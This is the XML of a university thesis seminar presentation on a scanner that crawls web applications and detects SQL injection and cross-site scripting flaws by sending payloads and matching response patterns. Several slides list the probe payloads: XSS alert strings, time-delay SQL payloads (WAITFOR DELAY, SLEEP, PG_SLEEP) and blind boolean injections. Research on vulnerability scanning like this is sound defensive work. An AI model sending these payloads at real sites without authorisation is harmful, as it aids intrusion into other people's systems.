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7" r:id="rId2"/>
    <p:sldId id="316" r:id="rId3"/>
    <p:sldId id="320" r:id="rId4"/>
    <p:sldId id="319" r:id="rId5"/>
    <p:sldId id="321" r:id="rId6"/>
    <p:sldId id="262" r:id="rId7"/>
    <p:sldId id="322" r:id="rId8"/>
    <p:sldId id="323" r:id="rId9"/>
    <p:sldId id="324" r:id="rId10"/>
    <p:sldId id="267" r:id="rId11"/>
    <p:sldId id="263" r:id="rId12"/>
    <p:sldId id="269" r:id="rId13"/>
    <p:sldId id="270" r:id="rId14"/>
    <p:sldId id="326" r:id="rId15"/>
    <p:sldId id="363" r:id="rId16"/>
    <p:sldId id="328" r:id="rId17"/>
    <p:sldId id="329" r:id="rId18"/>
    <p:sldId id="330" r:id="rId19"/>
    <p:sldId id="331" r:id="rId20"/>
    <p:sldId id="332" r:id="rId21"/>
    <p:sldId id="333" r:id="rId22"/>
    <p:sldId id="349" r:id="rId23"/>
    <p:sldId id="348" r:id="rId24"/>
    <p:sldId id="350" r:id="rId25"/>
    <p:sldId id="351" r:id="rId26"/>
    <p:sldId id="352" r:id="rId27"/>
    <p:sldId id="281" r:id="rId28"/>
    <p:sldId id="370" r:id="rId29"/>
    <p:sldId id="282" r:id="rId30"/>
    <p:sldId id="353" r:id="rId31"/>
    <p:sldId id="354" r:id="rId32"/>
    <p:sldId id="355" r:id="rId33"/>
    <p:sldId id="356" r:id="rId34"/>
    <p:sldId id="357" r:id="rId35"/>
    <p:sldId id="358" r:id="rId36"/>
    <p:sldId id="362" r:id="rId37"/>
    <p:sldId id="359" r:id="rId38"/>
    <p:sldId id="360" r:id="rId39"/>
    <p:sldId id="335" r:id="rId40"/>
    <p:sldId id="371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65" r:id="rId49"/>
    <p:sldId id="366" r:id="rId50"/>
    <p:sldId id="361" r:id="rId51"/>
    <p:sldId id="343" r:id="rId52"/>
    <p:sldId id="369" r:id="rId53"/>
    <p:sldId id="345" r:id="rId54"/>
    <p:sldId id="368" r:id="rId55"/>
    <p:sldId id="347" r:id="rId56"/>
    <p:sldId id="295" r:id="rId57"/>
    <p:sldId id="296" r:id="rId58"/>
    <p:sldId id="297" r:id="rId59"/>
    <p:sldId id="364" r:id="rId60"/>
    <p:sldId id="303" r:id="rId61"/>
    <p:sldId id="30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5EEAF-7E1E-4807-8446-5FA4F1D0228E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97D8-2A62-4202-BBB3-5399DD770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6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58B20-4285-4B78-9C63-1E84F0D33D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8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897D8-2A62-4202-BBB3-5399DD770C7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9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A2B9-1A81-4530-B516-F6222073B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B252B-D1BB-45B7-8139-02FB2E96C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20122-9BF6-4F07-8A9B-8712C82C0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FA37-ABF2-4430-9D7D-433E33946B31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BCAE-CAE4-4C30-AF1D-2E3B2E92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EB3B9-126A-4A4C-8DF3-3A2C49DA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4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1DE7-3495-4883-8106-CB67B66E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A56AC-68C7-4054-987B-ACA25A0F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70C60-8E6C-4B57-9E38-56870EF6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D107-9823-4761-BF33-2D12F0327B85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51519-00F7-4803-B0A8-1974AE6F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4194A-10E2-4BBA-8A73-6640C988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5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0E1653-4F11-43ED-805A-6AB109B2F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B8A70-805C-4282-A14E-AC1CBABB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DC06A-EC0E-481F-AF19-E22A1292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49CFB-7140-441C-AE5D-EB1977858ED9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577F7-404A-417F-A0D7-878E2C4D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2FAF4-ED3C-4C39-AF34-9C67EF80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6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3A01-691D-4322-91ED-C0403B43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2F66D-9BE6-4430-9C7E-02ACACC63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CCC84-F4F3-4D33-9F8F-D8A22BE4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94B9-F1B0-4973-849F-8BDC199BF0FB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7F6B-856B-42E9-BBCA-977286175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C1D98-D22C-4784-9A17-C46AF10D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2062-F3E9-4BA2-92B1-18A7F00F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F0B6-9F5D-42A2-8B62-DC7FE031A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06264-DE16-48B0-A119-336BC9AB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F97F-E855-40E9-9893-61D50F0DCDD8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09DAF-29B4-43C1-935F-D4361EB5D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543AA-896C-4730-B196-3034D21DF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6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50C5-F6A4-492A-8364-6B514320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16029-24D0-483C-8166-0BD6C84BB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6D765-1485-4615-956D-B55C4B2B9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337E6-59DF-4028-BD2E-701273F4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698F0-CDC2-4BDD-A8F5-6F4225C5B17A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57B1B-E21A-4638-95F3-319DDAD6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FDA4F-B1F6-4D57-9C32-A6E5259F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3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A34D-6B9E-4F1C-938C-ADE0E886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15300-F982-4701-AB07-7077E4777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53DA6-8136-4457-A0C6-E271CF139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F68CA-A6A6-49EB-97C6-D38FFA1D3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BBE186-3BD1-4AD0-9CA1-CD306351B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6BD39-0438-41ED-9908-FA75CB4E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46B88-063D-4B7D-AADB-DBC04A59CB4C}" type="datetime1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4AF62-227C-4EA6-9048-18C8FDEC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BAA73A-FEB0-45FA-B67C-D9DC49FF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8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F259-5BE2-4ABB-A40F-42134952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301BC-2DA0-4734-82EA-FB353621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2449B-4101-46A2-8CAC-36A4FFF3603C}" type="datetime1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810CC-EED8-46EF-AACA-F8ABEB61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70381-C61D-4B88-9A77-C2103B45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6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6BDA8-DC04-4860-8F4B-E4BFFF12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C820-0427-4B64-87C9-6228E0F8FB8E}" type="datetime1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6E969-230B-4D32-9AFB-FE40C07D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4A21C-167F-432F-ADEE-6FE5DF39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6657A-518B-407F-A763-2DE0DA84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6C9C7-F4D5-4A93-834C-602E7E1C2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F6A2D-D332-48C9-9D4D-C3E93E02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3013D-D067-4B5F-9234-C184E872C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D7CC-E54B-4367-BB36-25F2931DCEE2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2AD77-958F-4A5F-A3DF-F1D46D7F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032AB-1F24-4310-BB66-06296481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3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BA49-1A4D-4303-B92B-483128B2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4FC69-C290-4466-987F-53EA184A5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45487-1A11-4141-824A-EE9BFC15A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3F880-928F-4BAA-8090-AD4DF59B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D390-AEBF-42D2-8169-40A221BBA4E5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4B73-02C8-4031-BC41-6D73A51E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7E640-FAEC-4439-8C0E-B4224A62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0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292E49-CAEA-4277-91F2-360C7D6C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A97B6-46A4-4DE9-86D8-ED76DF3E8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4D52C-6516-4172-B318-A93B1ABF3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3A768-B997-4E1A-8F35-CB941843C87D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9357-5DA7-40BE-A8BE-3226BBF3D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B52B2-318F-4DB0-9C4B-F93990FCB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45908-9258-41DB-B1B3-379239A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0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Flow%20Chart%20Diagram%20of%20XSS_SQL_Scanning_Algorithm.docx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E1C6-BEF8-458C-BA79-CBCC9B6C6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175" y="447675"/>
            <a:ext cx="10915650" cy="146685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Vulnerability Testing System Using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XSS_SQL_Scanning_Algorithm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B3ECF-5F6C-4A9A-9481-97C975D65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901" y="3684588"/>
            <a:ext cx="5781674" cy="3048000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Dr. Zin Thu Thu Myint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: Ma Thinzar Aung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: 24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000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Batch</a:t>
            </a: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Class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	: M.C.Sc (Thesis)</a:t>
            </a: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Roll No.	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: CSF – 28 (6CS – 84)</a:t>
            </a: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Date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	: 23/6/2022</a:t>
            </a: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Seminar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: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A080C-AFE2-4D59-8AE7-6776C407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9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585E-6C90-4934-9EFD-3FD25925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Pattern Matching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E6AC-4EE2-439E-8424-9E1425C14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3250" cy="4881561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method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among other pattern matching algorithm and also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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Brute-Force algorithm.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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Naive pattern matching algorithm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finds all valid shifts using a loop that checks the condition P[1 . . m]=T[s + 1 . . s + m] for each of the n - m + 1 possible values of s.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371600" lvl="3" indent="0" algn="just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altLang="en-US" sz="1600" b="1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AIVE-STRING-MATCHER(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="1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T, P</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="1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en-US" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" bmk="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371600" lvl="3" indent="0" algn="just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(1)	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  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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length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     // T = Text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0" algn="just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	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 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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length[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	//   P = Pattern</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0" algn="just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(3)	 for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en-US" sz="1600" b="1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to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endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" bmk="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371600" lvl="3" indent="0" algn="just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(4)		 do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 . .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 =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+ 1 . .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</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="0" i="1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</a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0" algn="just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kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" bmk="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(5)			return  True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254F8-FE8D-438B-8AF0-E47AFD1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62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385B-5D1B-444D-97CF-275FDCB1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9FDD5-B2A4-4D0A-99E9-27B85B07C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“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SQL Injection Attack Scanner Using Boyer-Moore String Matching Algorithm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”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is proposed by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[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Faradilla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Abdul Rahman*,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Alya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Geogiana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Buja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Kamarularifin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Abd. Jalil,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Fakariah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Mohd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Ali]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="22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Their experiment was the technique of using pattern matching that avoided exploiting the web application from vulnerability.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 also it could detect vulnerability with the high accuracy.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But despite that, they required extra steps and storage in case of searching the patten string due to the use of the Boyer-Moore string matching algorithm.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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2B26-C890-42C9-8DFC-80DB865F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385B-5D1B-444D-97CF-275FDCB1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9FDD5-B2A4-4D0A-99E9-27B85B07C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“Detection of SQL Injection and XSS Vulnerability in Web Application”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proposed by [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Priti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Singh,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Kirthika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Thevar, Pooja Shetty, Bushra Shaikh]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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this paper, the approach method is good for detecting SQL injection vulnerability.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0">
              <a:latin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</a:rPr>
              <a:t>But, some weaknesses in detecting XSS attack because of using only one payload.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 this payload was restricted or encoded, it could not try with another payload, in this case it could not find any vulnerabilities although it should. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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system would be perfect if many payloads were used for detection.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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2B26-C890-42C9-8DFC-80DB865F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385B-5D1B-444D-97CF-275FDCB1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9FDD5-B2A4-4D0A-99E9-27B85B07C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Evaluation of String Searching Algorithms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 written by Simon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Wahstrom</a:t>
            </a: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this paper described that Naïve pattern matching algorithm is simple, no preprocessed state and easier to implement among other pattern matching algorithms.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takes running time was O(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mn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in the worst case, but searching of ordinary text takes O(m+n) where m is the length of the pattern and n means the text length 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he also presented naïve algorithm that was probably used when we expected to find a pattern was relatively short.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2B26-C890-42C9-8DFC-80DB865F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55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71C2-33D7-4282-AF4F-F32B6194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6B4E4-AAAE-4486-A7FB-A8E3AAB80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0375" cy="4351338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 , the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XSS_SQL_Scanning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deal with vulnerabilities of SQL injection and Cross-site Scripting.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Both of these two vulnerabilities detect to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look for attack signatures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 are caused by the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sending HTTP requests to the web server with attack patterns.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 can detect the types of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SQL injection such as error based, blind based, time based, and XSS vulnerability.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C8FDE-ADDC-4E0D-9357-EF9FA5E7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2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82AC-7938-4B07-A3C9-882406EE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6A6DC-C45E-44F7-B7F9-B551D794E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 order to complete this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there are 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four phases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included.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-4572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Scanning every possible page on web application </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-4572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 HTTP request methods and Parsing the URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-4572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Forwarding payloads to detect the web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-4572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the response to find the vulnerabilities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CA692-D1A5-4321-8CB2-05A460FE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1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14C83-61E6-43F6-91FD-26F5277D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E0FD0-CE29-49DE-820B-2372E2D44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44250" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-4572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Scanning every possible page on web application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 necessary to achieve </a:t>
            </a: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all possible links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algorithm, name as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Crawling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the process described in this steps.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="22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just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"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C5A04-CFE8-4549-B7CD-BC1A98DD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9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F779-E2A2-45B0-9E63-8C070E6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F0A70-F1D0-4FF3-871E-6CCC3EA38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92" y="1961890"/>
            <a:ext cx="5563980" cy="45914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66046D-2115-4769-B9CB-9E3C1F620FA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2451210" y="4052236"/>
            <a:ext cx="4581525" cy="11113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4F3E3-CFD1-44EF-9F0B-E62F8796B4D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7338398" y="3588147"/>
            <a:ext cx="425352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respective links by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page html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response and then these links are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appended in a list.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B209F-4EA9-434A-91C9-78BA9A14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17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1D7905-B67E-4D78-9F5A-A96B9D6F15DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7166192" y="4243987"/>
            <a:ext cx="344412" cy="350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9BAF08-FB1E-4BD7-9ADB-8EDB25F9504F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7413303" y="5267265"/>
            <a:ext cx="39055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link of list to act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crawling until all links are visited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00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7569-49D0-4FBA-829B-682A9739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DC1F2-80C0-4BA9-9E74-F42ADE5F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/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-4572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Looking for HTTP request methods and Parsing the URL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there are two methods as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GET and POST methods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browser sends HTTP requests to the server.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purpose of looking for these methods is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send data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the URL with the attack patterns to the web application.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type of request URL determines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points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GET method sends the information by appending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URL with query string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POST method requests the data enclosed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HTTP message body.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then, we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URL to know the </a:t>
            </a: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of the input points . </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-4572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 startAt="2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34A55-F8C0-42E8-8F53-832F1F09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6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44B7-3F33-4B4F-A508-19813366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3025B-2B11-432E-A555-7B2B5C0F2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Parsing the URL means that URL string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splits into its components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which the attributes in URL’s components such as scheme,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netloc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path, params, query and fragment.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example of  URL parsing.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https://www.bradfordshoes.com/product.php?cat_id=5   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="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='https',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netloc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='www.bradfordshoes.com',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product.php',params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=‘’,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="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=‘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cat_id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=5',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fragment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='' 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9479-3A32-4D48-8DBD-9A4E3D80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6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B040-93F4-43DB-B128-2357D182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4593-BD12-4EAB-A5C1-99B0F40EA2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Theory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System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Flow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0637B-E31E-47C4-A399-05A7E6D73A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1143000" marR="0" lvl="2" indent="-2286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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" marR="0" lvl="2" indent="-2286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Conclusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" marR="0" lvl="2" indent="-2286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Future works</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" marR="0" lvl="2" indent="-2286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References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" marR="0" lvl="2" indent="-2286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Thesis Schedule</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" marR="0" lvl="2" indent="-2286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19DCC-DDD1-4F23-92E8-67A7FAC3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0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51C0-A739-465F-8294-C4183F8D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5C6A8-21D2-400B-A7FA-30BA857AF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914400" lvl="1" indent="-4572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Forwarding payloads to detect the web application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identifying the input points at the previous step, the attack payload is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for generating attack.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is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previous existed attack patterns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are used by attackers in generating SQL injection and XSS attacks.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Next, we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web application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concatenating the payload to each crawled URL.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modified URL makes request to the web server then the server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the response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71600" lvl="2" indent="-4572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 startAt="3"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69FA5-48BB-43CB-ADD7-9DCDD7F2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8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9590-3269-48AB-95C0-A5BAC332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E31BF-8654-4D58-AB70-FC3B272E3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95" y="1487538"/>
            <a:ext cx="10963275" cy="5233937"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"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Payloads to Detect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XSS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[“ &lt;&gt;’ ", “ &lt;&gt;“ ", “ ‘ “ ", "&lt;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&gt;", "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onfocus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="alert(1);“ , "&lt;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/onload=alert(1)&gt;"]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[‘,’’,`,\]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based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;WAITFOR DELAY '00:00:01’--,;WAITFOR DELAY '00:00:01'-- -,;WAIT FOR DELAY 	                      '00:00:01’#,;WAIT FOR DELAY '00:00:01’;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;SELECT SLEEP(2)--, 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		      ;SELECT SLEEP(2)-- -,;SELECT SLEEP(2)#,;SELECT SLEEP(2); ;SELECT                 		       PG_SLEEP(2)--,;SELECT PG_SLEEP(2)-- -,;SELECT PG_SLEEP(2)#,;SELECT     	                       PG_SLEEP(2); ;SELECT PG_SLEEP(2)--,;SELECT PG_SLEEP(2)-- -,;SELECT   	                       PG_SLEEP(2)#,;SELECT PG_SLEEP(2);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blind based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[' AND 1=1--', ' AND 1=2--’], [' AND 1=1-- -', ' AND 1=2-- -’], [' AND 1=1#', ' AND 		       1=2#’], [' AND 1=1;', ' AND 1=2;’]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1A49D-D4B9-4176-96A9-B6FAA65C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0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49A3-676F-48FB-9F05-DD262B8F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F8A8-8799-47F8-9C15-B05B2793E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Autofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-45720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the response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analyzes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modified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url’s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normal SQL injection and XSS vulnerability detection, the system uses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Pattern matching algorithm with stored vulnerability payloads.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asks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true or false question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determines answer based on modified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url’s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response for blind based and time based SQL injection based on this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url’s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delay time.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2698A-020F-4EAE-8F76-3837142F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9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EB62-A038-438D-B14F-1E29BFA7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A97D3-DA60-4A71-BF27-AB0BBA6FA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any vulnerability is found in the response page, it will show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corresponding URL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well as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vulnerable input points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it provides a report as a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file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consists of all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vulnerable URLs, the processing time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list of prevention factors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associated with SQL and XSS.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68684-1AD0-4A13-8A86-B765B2D64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82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A8A0-4423-4C46-BCA7-640AD889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D5FC-97B4-4C32-92ED-5C6500F4E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 lvl="1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Vulnerability Payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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database errors and attack patterns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  <a:p>
            <a:pPr lvl="3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list of XSS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[“ &lt;&gt;’ ", “ &lt;&gt;“ ", “ ‘ “ ", "&lt;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&gt;", "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onfocus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="alert(1);“, 				       "&lt;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/onload=alert(1)&gt;" ]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3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list of SQL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["You have an error in your SQL syntax", "supplied argument is not a valid MySQL result resource", "check the manual that corresponds to your MySQL",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mysql_fetch_array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():supplied argument is not a valid MySQL", "function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fetch_row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()", "Microsoft OLE DB Provider for ODBC Drivers error",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mysqli_fetch_array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()",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mysql_num_rows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()",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mysql_free_result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()", "&lt;b&gt;Warning&lt;/b&gt;:  SQLite3", "unrecognized token:", "Unable to prepare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statement:","ERROR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syntax error" ]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3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FE56B-DB78-44DF-B302-35B5C5F1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2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5FE9-1ECD-4888-A7CD-91B13DC1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4FAB5-EE5C-40AB-8507-FB673FFD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algorithm,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Forwarding_payload_and_Analyzing_response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take the process of sending payload and analyzing the response.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6EC02-00CA-4370-B440-DFEFD330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25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53341B-08FC-4736-9893-2DA4085C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35" y="2570085"/>
            <a:ext cx="9829609" cy="42879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9DCA68-D52F-416E-86F1-DD7D716B2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80" y="3227865"/>
            <a:ext cx="4156109" cy="1950527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0A993E38-96BD-4146-805E-13B0A6AB001E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6301569" y="4970915"/>
            <a:ext cx="177687" cy="36136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D860FC-F2CE-43BD-BC2E-EC7E0C047D6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6560555" y="4980656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F9D47CFA-202C-4543-97DF-A8E67B9419AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6316557" y="5603045"/>
            <a:ext cx="177687" cy="88982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A1D16B-9E86-4818-93C9-58D8D54F7321}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6587279" y="5919327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7CFD8C5-DE21-43C0-B9D7-6C9B1A482E85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11369068" y="3333163"/>
            <a:ext cx="115676" cy="1277338"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2" fmla="val 476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DFBB0-C5A5-4285-B0B2-0719B815ADF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11577779" y="3734900"/>
            <a:ext cx="75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2060353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091A-ED10-4E93-A3D3-6339032C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XSS_SQL_Scanning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A11F7-75A7-4978-9337-C1323347E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XSS_SQL_Scanning_Algorithm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discovers Cross-Site Scripting and SQL injection vulnerabilities.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F2480-C2BD-4B5A-999E-B151D496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AD641-3797-4689-919A-08958E6C9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30" y="2652639"/>
            <a:ext cx="9705677" cy="3940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E1E19-11E6-4217-9C10-B9F956F8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89" y="3344402"/>
            <a:ext cx="4271611" cy="13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96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5754-7DD1-4E1F-9859-E1E9B113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 Flow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74D69-6DDB-4199-A094-498BB09D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76E61E-E8B3-40A6-8CA0-92D60B96C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" r="2128"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3028950" y="1228724"/>
            <a:ext cx="5987231" cy="5197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9C383B-8FE7-40E2-9464-CF154A0F27D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1471434" y="6397618"/>
            <a:ext cx="874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Architecture of Web Application Vulnerability Testing System Using  XSS_SQL_Scanning_Algorithm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1625910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5754-7DD1-4E1F-9859-E1E9B113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74D69-6DDB-4199-A094-498BB09D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28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C383B-8FE7-40E2-9464-CF154A0F27D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4609056" y="6470650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Flow chart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of  the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F6040392-5BB4-482D-8D18-8425FD891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365125"/>
            <a:ext cx="5321301" cy="58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15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2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Scanning possible URLs in Web Application)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D141E-3A23-48D7-A0B1-C7A47708B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54" y="972152"/>
            <a:ext cx="8807115" cy="538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173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AAA6-70EB-45D3-BF4E-7DA54647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CB076-A4F4-4BC5-A0D5-ED5A8E171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4725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:no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widespread use of the web application, it is a target of attackers to interrupt on this web application.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Attackers can exploit the web applications through a vulnerability to obtain some privileges in the system.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this system implements to find SQL injection vulnerability such as error based, blind based, time based, and XSS vulnerability.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two vulnerabilities are a huge risk for victim’s businesses and they are mostly occurred in the web applications.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the proposed system is tested using the well-known scanner and evaluate how accurate the results based on having false negative and false positive rate.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B98A-E07E-468E-9B3B-B7B39B45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8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27" y="1"/>
            <a:ext cx="10846870" cy="123203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(Filtering query of URL’s parse from the result of crawled URL)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B9EB7-7DAC-47A2-BAA0-D0938EB1D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69" y="972153"/>
            <a:ext cx="8807115" cy="538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997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27" y="136525"/>
            <a:ext cx="10846870" cy="109551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(Testing URLs with SQL quotes for SQL injection)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F8711-5062-406F-AFB6-864956701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04" y="945685"/>
            <a:ext cx="8807115" cy="5384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2641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27" y="136525"/>
            <a:ext cx="10846870" cy="109551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(Testing URLs with SQL blind based payloads for SQL injection)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19035-BDCC-4429-A2E2-CF1731F7A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04" y="1102095"/>
            <a:ext cx="8807115" cy="5384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959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27" y="136525"/>
            <a:ext cx="10846870" cy="109551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(Testing URLs with SQL time based payloads for SQL injection)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7AE47-EA96-4AB3-917D-F77DD2561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42" y="972154"/>
            <a:ext cx="8807115" cy="5384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2555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16" y="136525"/>
            <a:ext cx="11652984" cy="109551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(Showing the information type message box to know when testing 			       process is finish )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6F8B8F-7713-4FD4-97C6-F8600C756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50" y="1232035"/>
            <a:ext cx="8807115" cy="5384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1623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27" y="136525"/>
            <a:ext cx="10846870" cy="109551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(Testing Results)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0A73B-3E6C-4C9C-B88E-CC2FE40F434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04" y="1017307"/>
            <a:ext cx="8807115" cy="5384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2EDA86-68B7-4FD4-94B8-8E25D6AA9CF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1944704" y="4109987"/>
            <a:ext cx="6294521" cy="866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90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16" y="959507"/>
            <a:ext cx="11652984" cy="27252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effect caused by SQL vulnerability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ECFA8-299C-4078-8850-678289EE998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8" t="53411" r="603" b="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249129" y="1453415"/>
            <a:ext cx="9881135" cy="4445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E1D60A-AC9F-41FC-BF0C-4DF81B044B1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3797471" y="3760208"/>
            <a:ext cx="7332793" cy="180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8C7F9-4EC5-4981-8351-59F6F45A2E30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4449547" y="2942112"/>
            <a:ext cx="553726" cy="2416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10F61D-9524-4262-9760-55891DEB7B34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10563121" y="3003275"/>
            <a:ext cx="675032" cy="23332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 No.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BAA19B-CB8B-4DC6-88FA-455661B3198A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5976195" y="2941344"/>
            <a:ext cx="553726" cy="2416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0F5950-0986-4C48-A741-C38738D0FF0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7675092" y="2972226"/>
            <a:ext cx="553726" cy="2416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08829F-8A7A-47D1-BA9E-5E1DB702E881}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9201740" y="2963564"/>
            <a:ext cx="834888" cy="2416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Father Name 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E877358-EB32-4492-9867-897419D8EDC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4670173" y="3399969"/>
            <a:ext cx="140812" cy="2416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99EC8B0-DAB6-44E4-88BB-944A4CB2F315}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6189697" y="3392455"/>
            <a:ext cx="140812" cy="2416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9DA0D1A-5B47-4748-B0C9-0D22F336F631}"/>
              </a:ext>
